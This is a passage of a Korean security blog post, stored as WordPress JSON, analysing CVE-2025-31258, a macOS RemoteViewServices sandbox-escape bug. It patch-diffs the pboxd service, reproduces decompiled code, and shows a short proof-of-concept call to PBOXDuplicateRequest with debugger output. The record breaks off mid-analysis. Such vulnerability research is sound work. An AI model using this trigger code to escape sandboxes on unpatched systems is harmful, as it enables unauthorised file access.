{"id":3902,"date":"2025-07-31T09:33:30","date_gmt":"2025-07-31T00:33:30","guid":{"rendered":"https:\/\/h4ck.kr\/?p=3902"},"modified":"2025-07-31T09:33:32","modified_gmt":"2025-07-31T00:33:32","slug":"1day-cve-2025-31258-remoteviewservices-%ec%83%8c%eb%93%9c%eb%b0%95%ec%8a%a4-%ec%99%b8%ec%9d%98-%ec%a0%9c%ed%95%9c%ec%a0%81-%ed%8c%8c%ec%9d%bc-%ec%93%b0%ea%b8%b0-%ec%b7%a8%ec%95%bd%ec%a0%90","status":"publish","type":"post","link":"https:\/\/h4ck.kr\/?p=3902","title":{"rendered":"[1day] CVE-2025-31258: RemoteViewServices: \uc0cc\ub4dc\ubc15\uc2a4 \uc678\uc758 \uc81c\ud55c\uc801 \ud30c\uc77c \uc4f0\uae30 \ucde8\uc57d\uc810"},"content":{"rendered":"\n

http:\/\/support.apple.com\/ko-kr\/122716<\/a><\/p>\n\n\n\n

\"\"<\/figure>\n\n\n\n

\ud574\ub2f9 \ucde8\uc57d\uc810\uc740 macOS Sequoia 15.5\uc5d0\uc11c \ud328\uce58\ub418\uc5c8\uc73c\uba70, \uc0cc\ub4dc\ubc15\uc2a4\ub97c \ud0c8\ucd9c\ud560 \uc218 \uc788\ub294 \ucde8\uc57d\uc810\uc774\ub2e4.<\/p>\n\n\n\n

RemoteViewServices \uc11c\ube44\uc2a4\uc5d0\uc11c \ucde8\uc57d\uc810\uc774 \ubc1c\uc0dd\ud55c\ub2e4.<\/p>\n\n\n\n

Diffing \/ Analysis<\/h2>\n\n\n\n

\ucde8\uc57d\ud55c macOS 15.4.1 \ubc84\uc804\uacfc \ud328\uce58\ub41c 15.5 \ub300\uc0c1\uc73c\ub85c \ub514\ud551\uc744 \uc9c4\ud589\ud558\uc600\ub2e4.<\/p>\n\n\n\n

\ucde8\uc57d\uc810\uc774 \ubc1c\uacac\ub41c \ubc14\uc774\ub108\ub9ac\ub294 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n

    \n
  • \/System\/Library\/PrivateFrameworks\/RemoteViewServices.framework\/XPCServices\/com.apple.security.pboxd.xpc\/Contents\/MacOS\/com.apple.security.pboxd<\/li>\n<\/ul>\n\n\n\n
    \"\"<\/figure>\n\n\n\n

    \ubc14\uc774\ub108\ub9ac\ub97c \ucd94\ucd9c\ud574\uc11c Bindiff\ub97c \ud1b5\ud574 \ube44\uad50\ud574\ubd24\uc744 \ub54c, \ud568\uc218 1\uac1c\uc5d0\uc11c \ucc28\uc774\uc810\uc774 \uc874\uc7ac\ud558\uc600\ub2e4.<\/p>\n\n\n\n

      \n
    • -[PBOXRelatedItemSession _handleDuplicateRequest:withReply:]<\/li>\n<\/ul>\n\n\n\n

      \ud574\ub2f9 \uba54\uc18c\ub4dc\ub97c \uc0b4\ud3b4\ubcf4\uba74 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n

        \n
      • macOS 15.4.1 \ucde8\uc57d\ud55c \ubc84\uc804<\/li>\n<\/ul>\n\n\n\n
        id __cdecl -[PBOXRelatedItemSession _requestDuplicateDocument:withDuplicateName:error:](\n        PBOXRelatedItemSession *self,\n        SEL a2,\n        id a3,\n        id a4,\n        id *a5)\n{\n  NSError *v5; \/\/ x0\n  NSError *v6; \/\/ x0\n  NSError *v7; \/\/ x0\n  id v8; \/\/ x0\n  id v9; \/\/ x0\n  NSError *v10; \/\/ x0\n  NSError *v11; \/\/ x0\n  id v12; \/\/ x0\n  void *v13; \/\/ x0\n  NSError *v14; \/\/ x0\n  NSString *v15; \/\/ x8\n  id v16; \/\/ x0\n  void *v17; \/\/ x0\n  NSError *v19; \/\/ [xsp+38h] [xbp-1E8h]\n  id v20; \/\/ [xsp+40h] [xbp-1E0h]\n  __int64 v21; \/\/ [xsp+48h] [xbp-1D8h]\n  NSError *v22; \/\/ [xsp+50h] [xbp-1D0h]\n  NSFileManager *v23; \/\/ [xsp+58h] [xbp-1C8h]\n  unsigned __int8 v24; \/\/ [xsp+64h] [xbp-1BCh]\n  NSError *v25; \/\/ [xsp+68h] [xbp-1B8h]\n  id v26; \/\/ [xsp+70h] [xbp-1B0h]\n  int *v27; \/\/ [xsp+78h] [xbp-1A8h]\n  unsigned int v28; \/\/ [xsp+84h] [xbp-19Ch]\n  int *p_pid; \/\/ [xsp+90h] [xbp-190h]\n  unsigned int v30; \/\/ [xsp+9Ch] [xbp-184h]\n  NSError *v31; \/\/ [xsp+A0h] [xbp-180h]\n  id v32; \/\/ [xsp+B0h] [xbp-170h]\n  id v33; \/\/ [xsp+B8h] [xbp-168h]\n  unsigned __int8 v34; \/\/ [xsp+C4h] [xbp-15Ch]\n  NSError *v35; \/\/ [xsp+C8h] [xbp-158h]\n  id v36; \/\/ [xsp+D8h] [xbp-148h]\n  id v37; \/\/ [xsp+E0h] [xbp-140h]\n  int v38; \/\/ [xsp+ECh] [xbp-134h]\n  NSError *v39; \/\/ [xsp+F0h] [xbp-130h]\n  id v40; \/\/ [xsp+F8h] [xbp-128h]\n  id v41; \/\/ [xsp+100h] [xbp-120h]\n  NSArray *v42; \/\/ [xsp+108h] [xbp-118h]\n  void *v45; \/\/ [xsp+120h] [xbp-100h]\n  void *v46; \/\/ [xsp+128h] [xbp-F8h]\n  void *v47; \/\/ [xsp+138h] [xbp-E8h]\n  _OWORD v48[2]; \/\/ [xsp+140h] [xbp-E0h] BYREF\n  _OWORD v49[2]; \/\/ [xsp+160h] [xbp-C0h] BYREF\n  id v50; \/\/ [xsp+188h] [xbp-98h] BYREF\n  id v51; \/\/ [xsp+190h] [xbp-90h] BYREF\n  char v52; \/\/ [xsp+19Fh] [xbp-81h]\n  id v53; \/\/ [xsp+1A0h] [xbp-80h]\n  id v54; \/\/ [xsp+1A8h] [xbp-78h] BYREF\n  id v55; \/\/ [xsp+1B0h] [xbp-70h] BYREF\n  int v56; \/\/ [xsp+1BCh] [xbp-64h]\n  id v57; \/\/ [xsp+1C0h] [xbp-60h] BYREF\n  id v58; \/\/ [xsp+1C8h] [xbp-58h] BYREF\n  id v59; \/\/ [xsp+1D0h] [xbp-50h] BYREF\n  id v60; \/\/ [xsp+1D8h] [xbp-48h] BYREF\n  id *v61; \/\/ [xsp+1E0h] [xbp-40h]\n  id v62; \/\/ [xsp+1E8h] [xbp-38h] BYREF\n  id location[2]; \/\/ [xsp+1F0h] [xbp-30h] BYREF\n  PBOXRelatedItemSession *v64; \/\/ [xsp+200h] [xbp-20h]\n  id v65; \/\/ [xsp+208h] [xbp-18h]\n  __int64 vars8; \/\/ [xsp+228h] [xbp+8h]\n\n  v64 = self;\n  location[1] = (id)a2;\n  location[0] = 0;\n  objc_storeStrong(location, a3);\n  v62 = 0;\n  objc_storeStrong(&v62, a4);\n  v61 = a5;\n  v60 = 0;\n  v45 = objc_retainAutoreleasedReturnValue(objc_msgSend(location[0], \"stringByDeletingLastPathComponent\"));\n  v59 = objc_retainAutoreleasedReturnValue(objc_msgSend(v45, \"stringByPBOXRealPath\"));\n  objc_release(v45);\n  v46 = objc_retainAutoreleasedReturnValue(objc_msgSend(v62, \"stringByDeletingLastPathComponent\"));\n  v58 = objc_retainAutoreleasedReturnValue(objc_msgSend(v46, \"stringByPBOXRealPath\"));\n  objc_release(v46);\n  if ( ((unsigned int)objc_msgSend(v59, \"isEqualToString:\", v58) & 1) != 0 )\n    goto LABEL_8;\n  v42 = objc_retainAutoreleasedReturnValue(NSSearchPathForDirectoriesInDomains(NSDocumentDirectory, 1u, 1));\n  v41 = objc_retainAutoreleasedReturnValue(-[NSArray lastObject](v42, \"lastObject\"));\n  v57 = objc_retainAutoreleasedReturnValue(objc_msgSend(v41, \"stringByPBOXRealPath\"));\n  objc_release(v41);\n  objc_release(v42);\n  if ( v57 )\n  {\n    if ( ((unsigned int)objc_msgSend(v57, \"isEqualToString:\", v58) & 1) != 0 )\n    {\n      v56 = 0;\n    }\n    else\n    {\n      v39 = objc_retainAutoreleasedReturnValue(\n              +[NSError errorWithDomain:code:userInfo:](\n                &OBJC_CLASS___NSError,\n                \"errorWithDomain:code:userInfo:\",\n                NSPOSIXErrorDomain,\n                1,\n                0));\n      v5 = objc_autorelease(v39);\n      *v61 = v39;\n      v65 = 0;\n      v56 = 1;\n    }\n  }\n  else\n  {\n    v40 = objc_retainAutoreleasedReturnValue(+[RVSLogger defaultLogger](&OBJC_CLASS___RVSLogger, \"defaultLogger\"));\n    objc_msgSend(v40, \"debug:\", CFSTR(\"NSSearchPathForDirectoriesInDomains returns no Documents directory\"));\n    objc_release(v40);\n    v65 = 0;\n    v56 = 1;\n  }\n  objc_storeStrong(&v57, 0);\n  if ( !v56 )                                  \n  {\nLABEL_8:\n    v55 = objc_retainAutoreleasedReturnValue(objc_msgSend(location[0], \"lastPathComponent\"));\n    v54 = objc_retainAutoreleasedReturnValue(objc_msgSend(v62, \"lastPathComponent\"));\n    v36 = objc_retainAutoreleasedReturnValue(objc_msgSend(v55, \"pathExtension\"));\n    v37 = objc_retainAutoreleasedReturnValue(objc_msgSend(v54, \"pathExtension\"));\n    v52 = 0;\n    LOBYTE(v38) = 0;\n    if ( ((unsigned __int8)objc_msgSend(v36, \"isEqualToString:\") & 1) == 0 )\n    {\n      v53 = objc_retainAutoreleasedReturnValue(objc_msgSend(v54, \"pathExtension\"));\n      v52 = 1;\n      v38 = sub_10001332C(v53) ^ 1;\n    }\n    if ( (v52 & 1) != 0 )\n      objc_release(v53);\n    objc_release(v37);\n    objc_release(v36);\n    if ( (v38 & 1) != 0 )\n    {\n      v35 = objc_retainAutoreleasedReturnValue(\n              +[NSError errorWithDomain:code:userInfo:](\n                &OBJC_CLASS___NSError,\n                \"errorWithDomain:code:userInfo:\",\n                NSPOSIXErrorDomain,\n                1,\n                0));\n      v6 = objc_autorelease(v35);\n      *v61 = v35;\n      v65 = 0;\n      v56 = 1;\n    }\n    else\n    {\n      v33 = objc_retainAutoreleasedReturnValue(objc_msgSend(v54, \"stringByDeletingPathExtension\"));\n      v32 = objc_retainAutoreleasedReturnValue(objc_msgSend(v55, \"stringByDeletingPathExtension\"));\n      v34 = (unsigned __int8)+[NSDocument _validateDuplicateDocumentName:withOriginalName:](\n                               &OBJC_CLASS___NSDocument,\n                               \"_validateDuplicateDocumentName:withOriginalName:\",\n                               v33);\n      objc_release(v32);\n      objc_release(v33);\n      if ( (v34 & 1) != 0 )\n      {\n        v51 = objc_retainAutoreleasedReturnValue(objc_msgSend(v59, \"stringByAppendingPathComponent:\", v55));\n        v50 = objc_retainAutoreleasedReturnValue(objc_msgSend(v58, \"stringByAppendingPathComponent:\", v54));\n        p_pid = &v64->_pid;\n        v30 = SANDBOX_CHECK_NO_REPORT | 1 | SANDBOX_CHECK_CANONICAL;\n        v8 = objc_retainAutorelease(v51);\n        objc_msgSend(v51, \"UTF8String\");\n        v49[0] = *(_OWORD *)p_pid;\n        v49[1] = *((_OWORD *)p_pid + 1);\n        if ( (unsigned int)sandbox_check_by_audit_token(v49, \"file-write-data\", v30)\n          && (v27 = &v64->_pid,\n              v28 = SANDBOX_CHECK_NO_REPORT | 1 | SANDBOX_CHECK_CANONICAL,\n              v26 = v51,\n              v9 = objc_retainAutorelease(v51),\n              objc_msgSend(v26, \"UTF8String\"),\n              v48[0] = *(_OWORD *)v27,\n              v48[1] = *((_OWORD *)v27 + 1),\n              (unsigned int)sandbox_check_by_audit_token(v48, \"file-read-data\", v28)) )\n        {\n          v25 = objc_retainAutoreleasedReturnValue(\n                  +[NSError errorWithDomain:code:userInfo:](\n                    &OBJC_CLASS___NSError,\n                    \"errorWithDomain:code:userInfo:\",\n                    NSPOSIXErrorDomain,\n                    1,\n                    0));\n          v10 = objc_autorelease(v25);\n          *v61 = v25;\n          v65 = 0;\n          v56 = 1;\n        }\n        else\n        {\n          v23 = objc_retainAutoreleasedReturnValue(+[NSFileManager defaultManager](&OBJC_CLASS___NSFileManager, \"defaultManager\"));\n          v24 = -[NSFileManager fileExistsAtPath:](v23, \"fileExistsAtPath:\", v50);\n          objc_release(v23);\n          if ( (v24 & 1) != 0 )\n          {\n            v22 = objc_retainAutoreleasedReturnValue(\n                    +[NSError errorWithDomain:code:userInfo:](\n                      &OBJC_CLASS___NSError,\n                      \"errorWithDomain:code:userInfo:\",\n                      NSPOSIXErrorDomain,\n                      17,\n                      0));\n            v11 = objc_autorelease(v22);\n            *v61 = v22;\n            v65 = 0;\n            v56 = 1;\n          }\n          else\n          {\n            v21 = APP_SANDBOX_READ_WRITE;\n            v20 = v50;\n            v12 = objc_retainAutorelease(v50);\n            v13 = objc_msgSend(v20, \"UTF8String\");\n            v47 = (void *)sandbox_extension_issue_file(v21, v13, SANDBOX_EXTENSION_CANONICAL);\n            if ( v47 )\n            {\n              v15 = objc_retainAutoreleasedReturnValue(+[NSString stringWithUTF8String:](&OBJC_CLASS___NSString, \"stringWithUTF8String:\", v47));\n              v16 = v60;\n              v60 = v15;\n              objc_release(v16);\n              free(v47);\n              v65 = objc_retain(v60);\n            }\n            else\n            {\n              v19 = objc_retainAutoreleasedReturnValue(\n                      +[NSError errorWithDomain:code:userInfo:](\n                        &OBJC_CLASS___NSError,\n                        \"errorWithDomain:code:userInfo:\",\n                        NSPOSIXErrorDomain,\n                        *__error(),\n                        0));\n              v14 = objc_autorelease(v19);\n              *v61 = v19;\n              v65 = 0;\n            }\n            v56 = 1;\n          }\n        }\n        objc_storeStrong(&v50, 0);\n        objc_storeStrong(&v51, 0);\n      }\n      else\n      {\n        v31 = objc_retainAutoreleasedReturnValue(\n                +[NSError errorWithDomain:code:userInfo:](\n                  &OBJC_CLASS___NSError,\n                  \"errorWithDomain:code:userInfo:\",\n                  NSPOSIXErrorDomain,\n                  1,\n                  0));\n        v7 = objc_autorelease(v31);\n        *v61 = v31;\n        v65 = 0;\n        v56 = 1;\n      }\n    }\n    objc_storeStrong(&v54, 0);\n    objc_storeStrong(&v55, 0);\n  }\n  objc_storeStrong(&v58, 0);\n  objc_storeStrong(&v59, 0);\n  objc_storeStrong(&v60, 0);\n  objc_storeStrong(&v62, 0);\n  objc_storeStrong(location, 0);\n  v17 = v65;\n  if ( ((vars8 ^ (2 * vars8)) & 0x4000000000000000LL) != 0 )\n    __break(0xC471u);\n  return objc_autoreleaseReturnValue(v17);\n}\n<\/pre>\n\n\n\n
          \n
        • macOS 15.5 \ud328\uce58\ud55c \ubc84\uc804<\/li>\n<\/ul>\n\n\n\n
          void __cdecl -[PBOXRelatedItemSession _handleDuplicateRequest:withReply:](\n        PBOXRelatedItemSession *self,\n        SEL a2,\n        id a3,\n        id a4)\n{\n  id v5; \/\/ [xsp+30h] [xbp-20h] BYREF\n  id location[3]; \/\/ [xsp+38h] [xbp-18h] BYREF\n\n  location[2] = self;\n  location[1] = (id)a2;\n  location[0] = 0;\n  objc_storeStrong(location, a3);\n  v5 = 0;\n  objc_storeStrong(&v5, a4);\n  objc_msgSend(v5, \"setReturnCode:\", 0);\n  objc_storeStrong(&v5, 0);\n  objc_storeStrong(location, 0);\n}\n<\/pre>\n\n\n\n
          \uc704 \ud568\uc218\ub97c \ubcf4\uba74, \ud328\uce58\ub41c \ubc84\uc804\uc5d0\uc11c\ub294 \ub9ac\ud134\ucf54\ub4dc\ub97c \ud56d\uc0c1 0\uc73c\ub85c \uc138\ud305\ud558\uace0 \ucf54\ub4dc\uac00 \uc5c4\uccad \uc9e7\uc9c0\ub9cc \ucde8\uc57d\ud55c \ubc84\uc804\uc5d0\uc11c\ub294 \uadf8\ub807\uc9c0 \uc54a\ub2e4.<\/p>\n\n\n\n
          \ucde8\uc57d\ud55c \uba54\uc18c\ub4dc\ub97c \ud2b8\ub9ac\uac70\ud558\ub294 \ubc29\ubc95\uc740 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n
          (\ub3c4\uc911\uc5d0 \ubd84\uc11d\ud558\uae30 \uadc0\ucc2e\uc544\uc11c \u2026 \uc73c\ub85c \uc0dd\ub7b5)<\/p>\n\n\n\n
          \/\/ RemoteViewServices\nPBOXDuplicateRequest  \n-> _sendServiceRequest\n-> xpc_connection_send_message\n...\n\/\/ com.apple.security.pboxd\n-> -[PBOXServer run]\n-> sub_100001AEC\n-> sub_100001B50\n-> -[PBOXServer _dispatchRequestToNewSession:]\n-> sub_100001E14 \nxpc_dictionary_get_value(location[0], \"PBOXSessionTypeKey\"))\n...\nv8 = objc_alloc(&OBJC_CLASS___PBOXRelatedItemSession);\n          v9 = -[PBOXRelatedItemSession initWithConnection:](v8, \"initWithConnection:\", v36);\n...\n\n-> -[PBOXRelatedItemSession initWithConnection:]\n...\n-> -[PBOXRelatedItemSession connection:didReceiveRequest:]\n-> -[PBOXRelatedItemSession _handleDuplicateRequest:withReply:]\n-> -[PBOXRelatedItemSession _requestDuplicateDocument:withDuplicateName:error:]\n<\/pre>\n\n\n\n
          \ud2b8\ub9ac\uac70\ud558\ub294 \ubc29\ubc95\uc740 RemoteViewServices \ub77c\uc774\ube0c\ub7ec\ub9ac\uc758 PBOXDuplicateRequest \ud568\uc218\ub97c \uc0ac\uc6a9\ud558\ub294 \uac83\uc774\ub2e4.<\/p>\n\n\n\n
          \uc800 \ud568\uc218\ub97c \ubcf4\uc558\uc744\ub54c 3\uac1c\uc758 \ub9e4\uac1c\ubcc0\uc218\ub97c \uc785\ub825\ubc1b\ub294\ub370, \uac01 \ud0c0\uc785\uc744 \ucd94\uce21\ud558\uba74 \ub2e4\uc74c\uacfc \uac19\ub2e4.<\/p>\n\n\n\n
          \uba3c\uc800 a1,a2 \ub9e4\uac1c\ubcc0\uc218\ub294 \ud5a5\ud6c4 isFileURL \uc778\uc2a4\ud134\uc2a4 \uba54\uc18c\ub4dc\ub97c \ud638\ucd9c\ub418\uae30\uc5d0 NSURL *\ud0c0\uc785\uc774\uace0, a3\ub294 \ud5a5\ud6c4 “errorWithDomain:code:userInfo:\u201d \uba54\uc18c\ub4dc\ub97c \ud638\ucd9c\ud558\ub294\uac83\uc73c\ub85c \ubcf4\uc544 NSError *\ud0c0\uc785\uc774\ub2e4.<\/p>\n\n\n\n
          \ub530\ub77c\uc11c NULL \ub610\ub294 \ud638\ucd9c\uacb0\uacfc \uc5d0\ub7ec\uc815\ubcf4\ub97c \uc54c\uae30 \uc704\ud574 NSError * \uac1d\uccb4\ub85c \ub4e4\uc5b4\uac00\uba74 \ub420 \uac83\uc774\uace0, a1, a2\ub294 \ud30c\uc77c \uacbd\ub85c\ub97c \ub123\uc5b4\uc8fc\uba74 \ub420 \uac83\uc774\ub2e4.<\/p>\n\n\n\n
          a1 \u2192 PBOXRelatedItemDuplicateRequestRequestOriginalItemKey a2 \u2192 PBOXRelatedItemDuplicateRequestRequestDuplicateItemKey<\/p>\n\n\n\n
          \uc704\uc640 \uac19\uc774 \ud0a4 \uac12\uc73c\ub85c \uc124\uc815\ub41c\ub2e4.<\/p>\n\n\n\n
          __int64 __fastcall PBOXDuplicateRequest(void *a1, void *a2, _QWORD *a3)\n{\n  id v5; \/\/ x19\n  id v6; \/\/ x20\n  NSRemoteServiceRequest *v7; \/\/ x22\n  void *v8; \/\/ x23\n  void *v9; \/\/ x23\n  id v10; \/\/ x0\n  id v11; \/\/ x23\n  __int64 v12; \/\/ x21\n\n  v5 = objc_retain(a1);\n  v6 = objc_retain(a2);\n  if ( (unsigned int)objc_msgSend(v5, \"isFileURL\") && ((unsigned int)objc_msgSend(v6, \"isFileURL\") & 1) != 0 )\n  {\n    v7 = -[NSRemoteServiceRequest initWithType:](objc_alloc(&OBJC_CLASS___NSRemoteServiceRequest), \"initWithType:\", 2);\n    if ( v7 )\n    {\n      v8 = objc_retainAutoreleasedReturnValue(objc_msgSend(v5, \"path\"));\n      -[NSRemoteServiceRequest setArgument:forKey:](\n        v7,\n        \"setArgument:forKey:\",\n        v8,\n        CFSTR(\"PBOXRelatedItemDuplicateRequestRequestOriginalItemKey\"));\n      objc_release(v8);\n      v9 = objc_retainAutoreleasedReturnValue(objc_msgSend(v6, \"path\"));\n      -[NSRemoteServiceRequest setArgument:forKey:](\n        v7,\n        \"setArgument:forKey:\",\n        v9,\n        CFSTR(\"PBOXRelatedItemDuplicateRequestRequestDuplicateItemKey\"));\n      objc_release(v9);\n      v10 = objc_retainAutoreleasedReturnValue(_sendServiceRequest(v7));\n      v11 = v10;\n      if ( v10 )\n      {\n        v12 = handleReply(v10, a3);\nLABEL_11:\n        objc_release(v11);\n        objc_release(v7);\n        goto LABEL_12;\n      }\n    }\n    else\n    {\n      v11 = objc_retainAutoreleasedReturnValue(+[RVSLogger defaultLogger](&OBJC_CLASS___RVSLogger, \"defaultLogger\"));\n      objc_msgSend(v11, \"debug:\", CFSTR(\"PBOXDuplicateRequest: Could not create request object\"));\n    }\n    v12 = -1;\n    goto LABEL_11;\n  }\n  if ( a3 )\n    *a3 = objc_autorelease(objc_retainAutoreleasedReturnValue(objc_msgSend(MEMORY[0x1E8B56758], \"errorWithDomain:code:userInfo:\", *MEMORY[0x1E8B560F8], 22, 0)));\n  v12 = -1;\nLABEL_12:\n  objc_release(v6);\n  objc_release(v5);\n  return v12;\n}\n<\/pre>\n\n\n\n
          _sendServiceRequest \uba54\uc18c\ub4dc \ud638\ucd9c\ub85c \uc774\uc5b4\uc9c0\ub294\ub370,<\/p>\n\n\n\n
          PBOXSessionTypeKey \ud0a4\uac12\uc744 3\uc73c\ub85c \uc138\ud305\ud558\uace0 \ubcf4\ub0bc \uba54\uc2dc\uc9c0\uc640 \ud568\uaed8 com.apple.security.pboxd XPC \uc11c\ube44\uc2a4\uc640\uc758 \uc5f0\uacb0\uc744 \uc900\ube44\ud55c\uace0 \ubcf4\ub0b8\ub2e4.<\/p>\n\n\n\n
          id __fastcall _sendServiceRequest(void *a1)\n{\n  id v1; \/\/ x19\n  dispatch_queue_global_s *v2; \/\/ x21\n  _xpc_connection_s *v3; \/\/ x20\n  xpc_object_t v4; \/\/ x0\n  void *v5; \/\/ x21\n  NSRemoteServiceConnection *v6; \/\/ x23\n  id v7; \/\/ x22\n  id v8; \/\/ x0\n  __CFString *v9; \/\/ x2\n  __int64 vars8; \/\/ [xsp+38h] [xbp+8h]\n\n  v1 = objc_retain(a1);\n  v2 = objc_retainAutoreleasedReturnValue(dispatch_get_global_queue(0, 0));\n  v3 = xpc_connection_create(\"com.apple.security.pboxd\", v2);\n  objc_release(v2);\n  if ( v3 )\n  {\n    v4 = xpc_dictionary_create(0, 0, 0);\n    if ( v4 )\n    {\n      v5 = v4;\n      xpc_dictionary_set_uint64(v4, \"PBOXSessionTypeKey\", 3u);\n      xpc_connection_set_event_handler(v3, &__block_literal_global_2);\n      xpc_connection_resume(v3);\n      xpc_connection_send_message(v3, v5);\n      xpc_connection_suspend(v3);\n      v6 = -[NSRemoteServiceConnection initWithServiceConnection:](\n             objc_alloc(&OBJC_CLASS___NSRemoteServiceConnection),\n             \"initWithServiceConnection:\",\n             v3);\n      -[NSRemoteServiceConnection resume](v6, \"resume\");\n      v7 = objc_retainAutoreleasedReturnValue(-[NSRemoteServiceConnection sendSynchronousRequest:](v6, \"sendSynchronousRequest:\", v1));\n      objc_release(v6);\n      goto LABEL_7;\n    }\n    v8 = objc_retainAutoreleasedReturnValue(+[RVSLogger defaultLogger](&OBJC_CLASS___RVSLogger, \"defaultLogger\"));\n    v5 = v8;\n    v9 = CFSTR(\"_sendServiceRequest: Could not create session creation message\");\n  }\n  else\n  {\n    v8 = objc_retainAutoreleasedReturnValue(+[RVSLogger defaultLogger](&OBJC_CLASS___RVSLogger, \"defaultLogger\"));\n    v5 = v8;\n    v9 = CFSTR(\"_sendServiceRequest: Could not create connection to service\");\n  }\n  objc_msgSend(v8, \"debug:\", v9);\n  v7 = 0;\nLABEL_7:\n  objc_release(v5);\n  objc_release(v3);\n  objc_release(v1);\n  if ( ((vars8 ^ (2 * vars8)) & 0x4000000000000000LL) != 0 )\n    __break(0xC471u);\n  return objc_autoreleaseReturnValue(v7);\n}\n<\/pre>\n\n\n\n
          \uc5ec\uae30\uae4c\uc9c0\uac00 RemoteViewServices \ub77c\uc774\ube0c\ub7ec\ub9ac\uc758 \ubd84\uc11d \ub0b4\uc6a9\uc774\uc5c8\ub2e4. com.apple.security.pboxd XPC \ud504\ub85c\uc138\uc2a4\uc5d0\uc11c PBOXSessionTypeKey \ud0a4 \uac12\uc744 \ube44\uad50\ud558\ub294\ub370, \ud574\ub2f9 \ud568\uc218\ub294 sub_100001E14\uc774\ub2e4.<\/p>\n\n\n\n
          \ucd94\uc801\ud574\uc11c \ucd5c\uc885 \ucde8\uc57d\uc810\uc774 \uc788\ub294 \uba54\uc18c\ub4dc\uc778 -[PBOXRelatedItemSession _requestDuplicateDocument:withDuplicateName:error:] \uba54\uc18c\ub4dc\uc5d0 \ube0c\ub808\uc774\ud06c\ud3ec\uc778\ud2b8\ub97c \uac78\uace0,<\/p>\n\n\n\n
          poc \ucf54\ub4dc\uc5d0 \ub098\uc640\uc788\ub4ef \ub9e4\uac1c\ubcc0\uc218\uc5d0\ub294 \uac01\uac01 \u201c\/Users\/[\uc0ac\uc6a9\uc790\uba85]\/Documents\u201d, \u201c\/Users\/[\uc0ac\uc6a9\uc790\uba85]\/Documents copy 1337\u201d\uc744 \ub123\uc5b4\uc11c PBOXDuplicateRequest \ud568\uc218\ub97c \ud638\ucd9c\ud574\ubcf8\ub2e4.<\/p>\n\n\n\n
          NSString *documentsPath = [NSString stringWithFormat:@\"\/Users\/%@\/Documents\", NSUserName()];\n    \/\/_validateDuplicateDocumentName:withOriginalName: arg2\n    NSURL *documentsURL = [NSURL fileURLWithPath:documentsPath];\n\n    NSString *copiedPath =\n    [NSString stringWithFormat:@\"\/Users\/%@\/Documents copy 1337\", NSUserName()]; \/\/_validateDuplicateDocumentName:withOriginalName: arg1\n    NSURL *copiedURL = [NSURL fileURLWithPath:copiedPath];\n    \n    NSError *_error = nil;\n\n    int64_t result = PBOXDuplicateRequest(documentsURL, copiedURL, _error);\n<\/pre>\n\n\n\n
          \uadf8\ub7ec\uba74 \ud574\ub2f9 \ucde8\uc57d\uc810\uc774 \uc788\ub294 \uba54\uc18c\ub4dc\uc5d0\uc11c \uc2e4\ud589\uc774 \uc911\ub2e8\ub41c\ub2e4.<\/p>\n\n\n\n
          (lldb) c\nProcess 958 resuming\nProcess 958 stopped\n* thread #1, queue = 'com.apple.main-thread', stop reason = breakpoint 2.1\n    frame #0: 0x000000010074373c com.apple.security.pboxd`___lldb_unnamed_symbol509\ncom.apple.security.pboxd`___lldb_unnamed_symbol509:\n->  0x10074373c <+0>:  pacibsp \n    0x100743740 <+4>:  stp    x28, x27, [sp, #-0x20]!\n    0x100743744 <+8>:  stp    x29, x30, [sp, #0x10]\n    0x100743748 <+12>: add    x29, sp, #0x10\n    \n\n(lldb) po $x0\n<PBOXRelatedItemSession: 0xb101a90e0>\n\n(lldb) reg read x1\n      x1 = 0x0000000100750fab  \"_requestDuplicateDocument:withDuplicateName:error:\"\n(lldb) po $x2\n\/Users\/seo\/Documents\n\n(lldb) po $x3\n\/Users\/seo\/Documents copy 1337\n<\/pre>\n\n\n\n
          PBOXDuplicateRequest \ud568\uc218\uc5d0 \ub118\uae34 \ub9e4\uac1c\ubcc0\uc218\uac00 \uadf8\ub300\ub85c \ub118\uc5b4\uac00<\/p>\n\n\n\n
          a3 = \u201c\/Users\/seo\/Documents\u201d<\/p>\n\n\n\n
          a4 = \u201c\/Users\/seo\/Documents copy 1337\u201d\uac00 \ub4e4\uc5b4\uac04\ub2e4.<\/p>\n\n\n\n
          id __cdecl -[PBOXRelatedItemSession _requestDuplicateDocument:withDuplicateName:error:](\n        PBOXRelatedItemSession *self,\n        SEL a2,\n        id a3,\n        id a4,\n        id *a5)\n<\/pre>\n\n\n\n
          \uba3c\uc800 a3, a4\uc5d0 \ub4e4\uc5b4\uac04 \uacbd\ub85c\uc5d0\uc11c \uac01\uac01 \ub9c8\uc9c0\ub9c9 \uacbd\ub85c \ucef4\ud504\ub10c\ud2b8\ub97c \uc81c\uac70\ud558\uc5ec v60, v59 \ubcc0\uc218\uc5d0 \uc800\uc7a5\ud55c\ub2e4. stringByPBOXRealPath \uba54\uc18c\ub4dc\ub294 \ub0b4\ubd80\uc801\uc73c\ub85c realpath_DARWIN_EXTSN \ud568\uc218\ub97c \ud638\ucd9c\ud558\uc5ec \uc2e4\uc81c \uc808\ub300 \uacbd\ub85c\ub97c \uad6c\ud574\uc900\ub2e4.<\/p>\n\n\n\n
            v65 = self;\n  location[1] = (id)a2;\n  location[0] = 0;\n  objc_storeStrong(location, a3);\n  v63 = 0;\n  objc_storeStrong(&v63, a4);\n  v62 = a5;\n  v61 = 0;\n  v46 = objc_retainAutoreleasedReturnValue(objc_msgSend(location[0], \"stringByDeletingLastPathComponent\"));\/\/ \/Users\/seo\/Documents -> \/Users\/seo, a3\uc5d0 \ub4e4\uc5b4\uac04 \uacbd\ub85c\uc5d0\uc11c \ub9c8\uc9c0\ub9c9 \uacbd\ub85c \ucef4\ud3ec\ub10c\ud2b8\ub97c \uc81c\uac70\ud568\n  v60 = objc_retainAutoreleasedReturnValue(objc_msgSend(v46, \"stringByPBOXRealPath\"));\n  objc_release(v46);\n  v47 = objc_retainAutoreleasedReturnValue(objc_msgSend(v63, \"stringByDeletingLastPathComponent\"));\/\/ \/Users\/seo\/Documents copy 1337 -> \/Users\/seo, a4\uc5d0 \ub4e4\uc5b4\uac04 \uacbd\ub85c\uc5d0\uc11c \ub9c8\uc9c0\ub9c9 \uacbd\ub85c \ucef4\ud37c\ub10c\ud2b8\ub97c \uc81c\uac70\ud568\n  v59 = objc_retainAutoreleasedReturnValue(objc_msgSend(v47, 